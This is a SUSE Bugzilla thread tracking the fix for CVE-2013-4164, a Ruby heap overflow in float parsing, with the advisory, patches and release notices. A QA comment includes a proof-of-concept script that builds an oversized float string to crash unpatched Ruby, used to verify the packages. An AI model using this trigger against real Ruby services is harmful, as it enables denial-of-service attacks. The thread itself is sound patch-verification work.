Bugzilla – Bug 851803
VUL-0: CVE-2013-4164: ruby/ruby19/ruby20: heap overflow in float point parsing
Last modified: 2014-06-25 17:05:46 UTC
CVE-2013-4164 Heap Overflow in Floating Point Parsing (CVE-2013-4164) There is an overflow in floating point number parsing in Ruby. This vulnerability has been assigned the CVE identifier CVE-2013-4164. Details Any time a string is converted to a floating point value, a specially crafted string can cause a heap overflow. This can lead to a denial of service attack via segmentation faults and possibly arbitrary code execution. Any program that converts input of unknown origin to floating point values (especially common when accepting JSON) are vulnerable. Vulnerable code looks something like this: untrusted_data.to_f But any code that produces floating point values from external data is vulnerable, such as this: JSON.parse untrusted_data Note that this bug is similar to CVE-2009-0689. All users running an affected release should upgrade to the fixed versions of ruby. Affected versions All ruby 1.8 versions All ruby 1.9 versions prior to ruby 1.9.3 patchlevel 484 All ruby 2.0 versions prior to ruby 2.0.0 patchlevel 353 All ruby 2.1 versions prior to ruby 2.1.0 preview1 prior to trunk revision 43780 Solutions All users are recommended to upgrade to Ruby 1.9.3 patchlevel 484, ruby 2.0.0 patchlevel 353 or ruby 2.1.0 preview2. there is no patch for ruby 1.8 Credits Thanks to Charlie Somerville for reporting this issue References: https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/ https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/ https://www.ruby-lang.org/en/news/2013/11/22/ruby-2-0-0-p353-is-released/ http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4164 https://bugzilla.redhat.com/show_bug.cgi?id=1033460
The SWAMPID for this issue is 55205. This issue was rated as critical. Please submit fixed packages until 2013-11-26. When done, please reassign the bug to security-team@suse.de. Patchinfo will be handled by security team.
Created attachment 568688 [details] patch for 1.9.3
Created attachment 568690 [details] patch for 2.0.0
Created attachment 568695 [details] patch for 1.8.7
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208068 12.2 / ruby19 https://build.opensuse.org/request/show/208069 12.3 / ruby19 https://build.opensuse.org/request/show/208070 13.1 / ruby19
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208071 13.1 / ruby20
bugbot adjusting priority
upstream answered to our question if [1] is needed or not. it is not needed but without the change the bigdecimal library wont pass the test suite. the 1.8 patch already has this change. only the 1.9 and 2.0 patch need to be resubmitted. [1] https://github.com/ruby/ruby/commit/cf0efb8327d09da9ca6934de525c94bb377ad998
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208498 12.2 / ruby19
I've applied the patch and sent the submit requests again for ruby19 and ruby20. They should appear in the next minutes as comments .
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208503 12.3 / ruby19 https://build.opensuse.org/request/show/208504 13.1 / ruby19 https://build.opensuse.org/request/show/208505 13.1 / ruby20
Created attachment 569371 [details] foo.rb ruby foo.rb should not segmentation fault? taken from https://gist.github.com/jacopen/7636018
I've run the following script for ruby19 package candidates and the script worked as expected (no exploit) for openSUSE[12.2|12.3|13.1]: #require 'yajl' #require 'json' #require 'oj' def digit_pattern digit_pattern ||= rand(10000).to_s end def integer_part digit_pattern end def multiplier (500000 * (1.0/digit_pattern.size)).to_i end def fractional_part digit_pattern * multiplier end def evil_float_string [integer_part,fractional_part].join('.') end sploit = '[' sploit << evil_float_string sploit << ']' evil_float_string.to_f #UNSAFE #JSON.parse sploit #UNSAFE #Yajl::Parser.parse sploit #SAFE #Oj.load sploit #SAFE
However, it does not work with ruby20 package candidate. I mean with ruby20 package candidate it creates a segmentation fault. Thus ruby20 is not correctly patched.
I've found the problem in ruby20 package. I am submitting it again.
This is an autogenerated message for OBS integration: This bug (851803) was mentioned in https://build.opensuse.org/request/show/208840 13.1 / ruby20
we released ruby19 without the incremental fix. we will need to check if it has an impact.
as we did not releaser ruby19 yet we will respin it.
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-SERVER 11-SP1-TERADATA (x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP2 (i386, ia64, ppc64, s390x, x86_64) SLE-DESKTOP 11-SP2 (i386, x86_64) SLE-SDK 11-SP2 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP2 (i386, ia64, ppc64, s390x, x86_64) SLE-SLMS 1.3 (x86_64) SLE-STUDIOONSITE 1.3 (x86_64) SLE-WEBYAST 1.3 (i386, ia64, ppc64, s390x, x86_64) SLES4VMWARE 11-SP2 (i386, x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP3 (i386, ia64, ppc64, s390x, x86_64) SLE-DESKTOP 11-SP3 (i386, x86_64) SLE-SDK 11-SP3 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP3 (i386, ia64, ppc64, s390x, x86_64) SLES4VMWARE 11-SP3 (i386, x86_64)
openSUSE-SU-2013:1834-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 851803 CVE References: CVE-2013-4164 Sources used: openSUSE 13.1 (src): ruby20-2.0.0.p247-3.7.1
openSUSE-SU-2013:1835-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 851803 CVE References: CVE-2013-4164 Sources used: openSUSE 13.1 (src): ruby19-1.9.3.p448-2.4.1 openSUSE 12.3 (src): ruby19-1.9.3.p392-1.17.1 openSUSE 12.2 (src): ruby19-1.9.3.p392-3.34.1
assigning back to security team to close the bug.
Update released for: ruby19, ruby19-debuginfo, ruby19-debugsource, ruby19-devel, ruby19-devel-extra, ruby19-doc-ri, ruby19-tk Products: SLE-STUDIOONSITE 1.3 (x86_64)
done
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP1 (i386, s390x, x86_64) SLE-SERVER 11-SP1-LTSS (i386, s390x, x86_64)
Update released for: ruby, ruby-debuginfo, ruby-debugsource, ruby-devel, ruby-doc-html, ruby-doc-ri, ruby-examples, ruby-test-suite, ruby-tk Products: SLE-DEBUGINFO 11-SP2 (i386, s390x, x86_64) SLE-SERVER 11-SP2-LTSS (i386, s390x, x86_64)
SUSE-SU-2014:0843-1: An update that fixes three vulnerabilities is now available. Category: security (moderate) Bug References: 808137,827265,851803 CVE References: CVE-2013-1821,CVE-2013-4073,CVE-2013-4164 Sources used: SUSE Linux Enterprise Server 11 SP2 LTSS (src): ruby-1.8.7.p357-0.9.15.6
SUSE-SU-2014:0844-1: An update that fixes four vulnerabilities is now available. Category: security (moderate) Bug References: 783525,808137,827265,851803 CVE References: CVE-2012-4481,CVE-2013-1821,CVE-2013-4073,CVE-2013-4164 Sources used: SUSE Linux Enterprise Server 11 SP1 LTSS (src): ruby-1.8.7.p357-0.9.15.6